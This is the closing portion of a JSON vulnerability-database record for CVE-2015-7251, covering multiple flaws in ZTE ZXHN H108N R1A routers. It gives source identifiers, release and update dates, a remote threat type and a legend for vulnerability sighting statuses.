"db": "PACKETSTORM",
"id": "134492"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-239"
},
{
"db": "NVD",
"id": "CVE-2015-7251"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-11-03T00:00:00",
"db": "CERT/CC",
"id": "VU#391604"
},
{
"date": "2015-11-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-07626"
},
{
"date": "2015-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-85212"
},
{
"date": "2015-12-30T00:00:00",
"db": "VULMON",
"id": "CVE-2015-7251"
},
{
"date": "2015-11-04T00:00:00",
"db": "BID",
"id": "77421"
},
{
"date": "2016-01-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-006590"
},
{
"date": "2015-11-20T22:24:32",
"db": "PACKETSTORM",
"id": "134492"
},
{
"date": "2015-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201511-239"
},
{
"date": "2015-12-30T05:59:04.160000",
"db": "NVD",
"id": "CVE-2015-7251"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-11-04T00:00:00",
"db": "CERT/CC",
"id": "VU#391604"
},
{
"date": "2015-11-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-07626"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-85212"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULMON",
"id": "CVE-2015-7251"
},
{
"date": "2016-02-02T20:05:00",
"db": "BID",
"id": "77421"
},
{
"date": "2016-01-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-006590"
},
{
"date": "2015-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201511-239"
},
{
"date": "2024-11-21T02:36:26.287000",
"db": "NVD",
"id": "CVE-2015-7251"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201511-239"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE ZXHN H108N R1A routers contain multiple vulnerabilities",
"sources": [
{
"db": "CERT/CC",
"id": "VU#391604"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201511-239"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.